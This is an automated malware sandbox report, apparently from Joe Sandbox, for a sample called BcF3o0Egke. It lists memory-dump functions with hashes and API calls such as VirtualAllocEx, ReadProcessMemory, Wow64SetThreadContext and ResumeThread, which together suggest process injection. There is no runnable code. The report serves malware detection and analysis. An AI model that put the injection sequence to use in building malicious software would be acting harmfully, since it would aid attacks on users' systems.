                                                                    • Instruction Fuzzy Hash: 182138B19002099FDB10DFAAC585BEEBBF4EF49314F10842AD519A7240CB789945CFA1
                                                                    Function 07274F30 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07274FAE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2246003976.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7270000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: ContextThreadWow64
                                                                    • String ID:
                                                                    • API String ID: 983334009-0
                                                                    • Opcode ID: 6e4c701e8d29ed391d60b669c3e7cb5d1b786d493f83f0e3485597fa4e20b42a
                                                                    • Instruction ID: 2b40969c8df017e7fd20fba94885b92671132bacc880f825079f77117960040a
                                                                    • Opcode Fuzzy Hash: 6e4c701e8d29ed391d60b669c3e7cb5d1b786d493f83f0e3485597fa4e20b42a
                                                                    • Instruction Fuzzy Hash: F42135B19002098FDB10DFAAC585BEEBBF4EF89314F10842AD519A7240CB78A945CFA1
                                                                    Function 072751B8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07275238
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2246003976.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7270000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: MemoryProcessRead
                                                                    • String ID:
                                                                    • API String ID: 1726664587-0
                                                                    • Opcode ID: ebd2e61e4608749cbc425cc1839dfec9b11e8997a6f44c9339df121d21b9407f
                                                                    • Instruction ID: f41a9aaad11e9f55172283de7ab800a1abe2daf4f4169386d4486e6064c0712c
                                                                    • Opcode Fuzzy Hash: ebd2e61e4608749cbc425cc1839dfec9b11e8997a6f44c9339df121d21b9407f
                                                                    • Instruction Fuzzy Hash: ED213AB1C003499FCB10DFAAC941AEEFBF5FF48310F50842AE519A7250C7789941CBA1
                                                                    Function 00BCD740 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00BCD7C7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2238564786.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_bc0000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    • Opcode ID: 73cf66c2670a5fea0753ceef4fef56f22c1e3e51ea7fb4e3d182bf85ec673995
                                                                    • Instruction ID: a590fba96799c84f2c0f9a464caee6ef2b916f778f16addc92bc953fb3738f5e
                                                                    • Opcode Fuzzy Hash: 73cf66c2670a5fea0753ceef4fef56f22c1e3e51ea7fb4e3d182bf85ec673995
                                                                    • Instruction Fuzzy Hash: E521F3B59002089FDB10CFAAD984ADEFFF8FB48310F14841AE918A3310D378A940CFA0
                                                                    Function 07275007 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07275076
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2246003976.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7270000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: a62922d4924833b588284ad9d4bb659706bac1782af1c87bd5a76f56347447a6
                                                                    • Instruction ID: fc181a33f89855d86172e409ca4ef7227ed46df58fa0ea04975a8eb7cfbce5ca
                                                                    • Opcode Fuzzy Hash: a62922d4924833b588284ad9d4bb659706bac1782af1c87bd5a76f56347447a6
                                                                    • Instruction Fuzzy Hash: DD1126B58002499FCB20DFAAC845AEEFFF5FF89310F108819E519A7250CB79A554CBA1
                                                                    Function 07275008 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07275076
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2246003976.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7270000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: 1feeaa62178402bfcb7ec5ffb60e9ffe9a5d8bc8bccd3ed2c95bb5f48df24ca9
                                                                    • Instruction ID: 6420a1d6bf6dcddb8c758d50d8ab33205fdf779c0dd3b7a420102b0455a12a74
                                                                    • Opcode Fuzzy Hash: 1feeaa62178402bfcb7ec5ffb60e9ffe9a5d8bc8bccd3ed2c95bb5f48df24ca9
                                                                    • Instruction Fuzzy Hash: B81137B18002499FCB10DFAAC845AEEFFF5FF89310F108819E519A7250C779A554CFA0
                                                                    Function 07274A47 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2246003976.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7270000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: ResumeThread
                                                                    • String ID:
                                                                    • API String ID: 947044025-0
                                                                    • Opcode ID: 8322677c4f154ed4b6bc85e95f390f3c4678a27075cdafbe2b90f3bd2bbdf168
                                                                    • Instruction ID: 105f410b8b704b41eb5a626dfb9f282e78af32ae154887d725a12e374744632a
                                                                    • Opcode Fuzzy Hash: 8322677c4f154ed4b6bc85e95f390f3c4678a27075cdafbe2b90f3bd2bbdf168
                                                                    • Instruction Fuzzy Hash: AF116AB1D002498FCB20DFAAC4457EEFFF4EF88310F20841AD419A7240CB79A540CBA4
                                                                    Function 07274A48 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2246003976.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7270000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: ResumeThread
                                                                    • String ID:
                                                                    • API String ID: 947044025-0
                                                                    • Opcode ID: d2a9ceeb2a151a4d7cd7154985a9660b83a17e05da4a83032856d3174b9b082d
                                                                    • Instruction ID: 5fe253ea4dfb3e04d3db5d0de10986513058686ca6e3043a1726315af94a91a3
                                                                    • Opcode Fuzzy Hash: d2a9ceeb2a151a4d7cd7154985a9660b83a17e05da4a83032856d3174b9b082d
                                                                    • Instruction Fuzzy Hash: 9C1136B1D002498FDB20DFAAC4457EEFBF5EF89324F24841AD519A7240CB79A944CBA4
                                                                    Function 07277A80 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 07277AE5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2246003976.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7270000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePost
                                                                    • String ID:
                                                                    • API String ID: 410705778-0
                                                                    • Opcode ID: e5c05bb8ea4d14fbe808b66b7a90c45774b930e43ce133edc4644c73ebacf369
                                                                    • Instruction ID: b0347527cc5c00a3e955e2b9635e467d011161965529d44fed8381cb0c9d8b15
                                                                    • Opcode Fuzzy Hash: e5c05bb8ea4d14fbe808b66b7a90c45774b930e43ce133edc4644c73ebacf369
                                                                    • Instruction Fuzzy Hash: 2C1103B58003499FDB10DF9AD949BDEBFF8FB49320F10841AE558A7200D379A584CFA1
                                                                    Function 072753E8 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 07277AE5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2246003976.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7270000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePost
                                                                    • String ID:
                                                                    • API String ID: 410705778-0
                                                                    • Opcode ID: 8062377cea6cfdce034bc0821cf01db71804be57bd7a7ffe64bba986bc461d82
                                                                    • Instruction ID: 55d3023705eec4073c672514dd5260e223fa6167eedc7071347cfab07b38e720
                                                                    • Opcode Fuzzy Hash: 8062377cea6cfdce034bc0821cf01db71804be57bd7a7ffe64bba986bc461d82
                                                                    • Instruction Fuzzy Hash: B11103B58103499FDB10DF9AC945BDEBBF8FB49310F10841AE559A7310C3B9A944CFA1
                                                                    Function 00BCB058 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00BCB0BE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2238564786.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_bc0000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule
                                                                    • String ID:
                                                                    • API String ID: 4139908857-0
                                                                    • Opcode ID: 2a4e86a6cd18c1502425888133e1349b755999f98d692f4d38b33d51cd3ceb1a
                                                                    • Instruction ID: 0fe197bb78281c64fd6c17956ff40796a7c84077356cdb79b9e5a099af3b43ab
                                                                    • Opcode Fuzzy Hash: 2a4e86a6cd18c1502425888133e1349b755999f98d692f4d38b33d51cd3ceb1a
                                                                    • Instruction Fuzzy Hash: 0C1110B6C002498FCB10CF9AC444BDEFBF8EF88310F10845AD429A7210D379A545CFA1
                                                                    Function 0085D4C4 Relevance: .1, Instructions: 75COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2238200008.000000000085D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0085D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_85d000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 93a1a77f74b130b2300057dba95766435839f4a7ea4f3e493dd10ea7587b70a9
                                                                    • Instruction ID: b25b42a91c30a81e032ec1c10be4f9b19798f93cce311df3f08aae8424273bb7
                                                                    • Opcode Fuzzy Hash: 93a1a77f74b130b2300057dba95766435839f4a7ea4f3e493dd10ea7587b70a9
                                                                    • Instruction Fuzzy Hash: EF213071500304DFCB25DF24C9C0F26BF65FB98319F20C5A9EC098B256D33AD84ACAA2
                                                                    Function 0085D3D8 Relevance: .1, Instructions: 75COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2238200008.000000000085D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0085D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_85d000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 248d997e57cc4eede959c92b92c8a99f1293d0260ad35aba545c9fdc58b21d94
                                                                    • Instruction ID: 5ffa225e26490a257860276b940cb778cced04fda8df30c05294dcc17dee5a71
                                                                    • Opcode Fuzzy Hash: 248d997e57cc4eede959c92b92c8a99f1293d0260ad35aba545c9fdc58b21d94
                                                                    • Instruction Fuzzy Hash: 45210371500304DFDB25DF14D9C0B26BF65FB98325F20C569ED098B256C33AE85ADAA2
                                                                    Function 0086D1D4 Relevance: .1, Instructions: 72COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2238235741.000000000086D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_86d000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9edc80c7ebaba6d91999a6504a8ef134116e38ac722ffe95c55597236c924d11
                                                                    • Instruction ID: f4a2b4b835f3932fe6ea6c250770feacffe6cbb12e63fd1f4c31b9220495b86f
                                                                    • Opcode Fuzzy Hash: 9edc80c7ebaba6d91999a6504a8ef134116e38ac722ffe95c55597236c924d11
                                                                    • Instruction Fuzzy Hash: CD21D371A04304DFDB05DF14D590B26BB65FB88314F24C569D9098B356C33AE846CA61
                                                                    Function 0086D01C Relevance: .1, Instructions: 72COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2238235741.000000000086D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_86d000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2727cf5ad2485249fe1b6bd7ea718f72d671172ab790f0f3b8be4be587f6108b
                                                                    • Instruction ID: 7e4d7f4ef529ca41292d1807f37a36b0e821057a79d9dff4b8b76db09195d6af
                                                                    • Opcode Fuzzy Hash: 2727cf5ad2485249fe1b6bd7ea718f72d671172ab790f0f3b8be4be587f6108b
                                                                    • Instruction Fuzzy Hash: 7B21D375A04744DFCB14DF24D584B26BB65FB88314F24C569D9098B256C33AD807CAA2
                                                                    Function 0085D3D3 Relevance: .1, Instructions: 56COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2238200008.000000000085D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0085D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_85d000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                    • Instruction ID: 0a4c6be74d58ff8687e0181ef36f769f03b9fc1d6b9585cb8891eeae9a531cd3
                                                                    • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                    • Instruction Fuzzy Hash: 7411CD72404240CFDB16CF00D5C4B16BF62FB94324F24C6A9DD494A256C33AE85ACBA2
                                                                    Function 0085D4BF Relevance: .1, Instructions: 56COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2238200008.000000000085D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0085D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_85d000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                    • Instruction ID: 9bf7ecca01c30ac4fbe99ca45a83893ba869977a3c2b019f8a4013fd76be6629
                                                                    • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                    • Instruction Fuzzy Hash: B011AF76504280CFCB16CF14D5C4B16BF72FB98314F24C6A9DD494B656C336D85ACBA2
                                                                    Function 0086D017 Relevance: .1, Instructions: 53COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2238235741.000000000086D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_86d000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                    • Instruction ID: b890abfc126b1f29e1d01a71e4a224a865f264594cb2d728fce9ac27f9d21e38
                                                                    • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                    • Instruction Fuzzy Hash: A4118E75A04780DFDB15CF14D5C4B15BB62FB88314F24C6A9D8498B656C33AD84ACB62
                                                                    Function 0086D1CF Relevance: .1, Instructions: 53COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2238235741.000000000086D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_86d000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                    • Instruction ID: 9787f3cc96861ecdc92b8b375022fecafc4a3620e4b7fe89ed4611c119e47365
                                                                    • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                    • Instruction Fuzzy Hash: 4B11BE75A04340DFCB12CF10C5D4B15BB61FB84314F28C6A9D8498B356C33AE84ACB61
                                                                    Function 0085D745 Relevance: .0, Instructions: 45COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2238200008.000000000085D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0085D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_85d000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 48644adb309a77a64110ea6a6d292afe1dd718b8aaceb4759f07c129f1d9f605
                                                                    • Instruction ID: 8e2954d47f48da6e4837b7f8d5ef4c60fbe4495cfb029c765fb81d5cd6beac64
                                                                    • Opcode Fuzzy Hash: 48644adb309a77a64110ea6a6d292afe1dd718b8aaceb4759f07c129f1d9f605
                                                                    • Instruction Fuzzy Hash: 2501DB710053449AE7309F15CD84B67BF9CFF4A325F18C56AED098A286D2799849CAB1
                                                                    Function 0085D744 Relevance: .0, Instructions: 36COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2238200008.000000000085D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0085D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_85d000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ab5ee59cc3054bd29ba4f8fe8719deff6b89cd18affe5f368181df3c2bfbe123
                                                                    • Instruction ID: ca95a18cd444a809675aa72bd551650e70b799ce6246e86a728ec384a2d200a4
                                                                    • Opcode Fuzzy Hash: ab5ee59cc3054bd29ba4f8fe8719deff6b89cd18affe5f368181df3c2bfbe123
                                                                    • Instruction Fuzzy Hash: A2F09071405344AEE7208E1ADC88B62FFA8FF96735F18C45AED484B286D3799C44CBB1

                                                                    Non-executed Functions

                                                                    Function 07278B98 Relevance: .5, Instructions: 504COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2246003976.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7270000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 814b6cbe3b2ee363512b38f4ce06f4fa9f8ade00cfefa2f377ac0442ef37bd1c
                                                                    • Instruction ID: b3ade9955b18f236ef8762503e55b1e575ae6a04fd30dd6677c5525876147feb
                                                                    • Opcode Fuzzy Hash: 814b6cbe3b2ee363512b38f4ce06f4fa9f8ade00cfefa2f377ac0442ef37bd1c
                                                                    • Instruction Fuzzy Hash: AFD1FCB0B117068FEB19DB35C614B6EB7F6AF8A704F5444ADE146CB291DB34E802CB52
                                                                    Function 072725E0 Relevance: .3, Instructions: 312COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2246003976.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7270000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0a10f87db0c9964d7342ca50913932d4327ab7412f22525b799490865e71a733
                                                                    • Instruction ID: bf4849f203614ea1a0bf809d7dc0db91d88430d8e8bdb7f4ad1c832d4231049d
                                                                    • Opcode Fuzzy Hash: 0a10f87db0c9964d7342ca50913932d4327ab7412f22525b799490865e71a733
                                                                    • Instruction Fuzzy Hash: 7CE1C4B4E10119CBDB14DFA9C6809AEFBF2FF89305F248169D418AB356D731A942CF61
                                                                    Function 07274220 Relevance: .3, Instructions: 312COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2246003976.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7270000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 25122599861d31e3c1107f0b924afd87ab96d9cc9ae159684a4484b86c8c5032
                                                                    • Instruction ID: 70929e83080746fd47296b8c60413bd885fc3928dac3064d4a77032b4dff7abe
                                                                    • Opcode Fuzzy Hash: 25122599861d31e3c1107f0b924afd87ab96d9cc9ae159684a4484b86c8c5032
                                                                    • Instruction Fuzzy Hash: BEE10CB4E101598FDB14DFA9C6809AEFBF2FF89305F248159D418A7356D730A942CF61
                                                                    Function 07272A18 Relevance: .3, Instructions: 312COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2246003976.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7270000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cf2b6aa94f1935976c81992dc1334ca2121052631714e23a9c49106de908a552
                                                                    • Instruction ID: 1c32a50f5f217bae3ecb5081b44d37f3520f0b4e1805b06ff4520a34ba3c4ff5
                                                                    • Opcode Fuzzy Hash: cf2b6aa94f1935976c81992dc1334ca2121052631714e23a9c49106de908a552
                                                                    • Instruction Fuzzy Hash: 4EE1D7B4E101198FDB14DFA9C6809AEFBF2FF89305F248169D414AB356D731A942CF61
                                                                    Function 07274AF8 Relevance: .3, Instructions: 312COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2246003976.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7270000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1158e9ac363f6db0e408e5ed722e8bd7af667bda03dd56c2bc9268ac9f181d81
                                                                    • Instruction ID: b6483b919440628b68c81d4ae88af11dd2420a629247034621546a2449698f41
                                                                    • Opcode Fuzzy Hash: 1158e9ac363f6db0e408e5ed722e8bd7af667bda03dd56c2bc9268ac9f181d81
                                                                    • Instruction Fuzzy Hash: 45E119B4E101598FDB14DFA8C6809AEFBF2FF89305F248169D414AB356D731A942CFA1
                                                                    Function 072721A8 Relevance: .3, Instructions: 312COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2246003976.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7270000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5a0fa164bee62512dc06e1c19e353224ccf6efe1cad9fd8141b70cea380e7139
                                                                    • Instruction ID: 9e2b2a11a5c76d0e450fb03e75e92a6f66c63b6528d824996b68e7856de6094d
                                                                    • Opcode Fuzzy Hash: 5a0fa164bee62512dc06e1c19e353224ccf6efe1cad9fd8141b70cea380e7139
                                                                    • Instruction Fuzzy Hash: D3E1D6B4E101198FDB14DFA9C6909AEFBF2FF89305F248169D418AB356D730A942CF61
                                                                    Function 069A0FE8 Relevance: .3, Instructions: 275COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2244691009.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_69a0000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 30ec147b72bd2b54c270fbd887c0d424f27427d7f7b1561dd2e1de475b371886
                                                                    • Instruction ID: 5f5f79d8ea55d91843db235d6d01589f9e4f99320994423423b5a1327a56d0f8
                                                                    • Opcode Fuzzy Hash: 30ec147b72bd2b54c270fbd887c0d424f27427d7f7b1561dd2e1de475b371886
                                                                    • Instruction Fuzzy Hash: C7D11B31D2075ADACB01EB68D990A9DB7B1FF95300F10C79AD40977624EF70AAC9CB91
                                                                    Function 00BCD424 Relevance: .3, Instructions: 264COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2238564786.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_bc0000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 256f85f7228cde5f5ea5803facbff8676ef8cdb08c83b0e20e11a875270ba0a5
                                                                    • Instruction ID: 05de3f9765a10a178b04986399db9be39dc58077c0e975cf6797a838e7e5a1a6
                                                                    • Opcode Fuzzy Hash: 256f85f7228cde5f5ea5803facbff8676ef8cdb08c83b0e20e11a875270ba0a5
                                                                    • Instruction Fuzzy Hash: 98A11936A00216DFCF05DFA5C884AAEB7F2FF85300B1585BAE805AB265DB71E955CB40
                                                                    Function 069A0FF8 Relevance: .3, Instructions: 264COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2244691009.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_69a0000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c507113f68f49d4c946360b97099268ef2e4be775ca46bbd1d74166b3528b13d
                                                                    • Instruction ID: c0f68936ffed4c317c2359fec09a57d7dc067f658ab9a345c65666b8541ea19d
                                                                    • Opcode Fuzzy Hash: c507113f68f49d4c946360b97099268ef2e4be775ca46bbd1d74166b3528b13d
                                                                    • Instruction Fuzzy Hash: 10D11A31D2071ADACB01EB68D990A9DB7B1FF95300F10C79AD50977624EF70AAC9CB91

                                                                    Execution Graph

                                                                    Execution Coverage:1.2%
                                                                    Dynamic/Decrypted Code Coverage:4.5%
                                                                    Signature Coverage:8.4%
                                                                    Total number of Nodes:155
                                                                    Total number of Limit Nodes:15
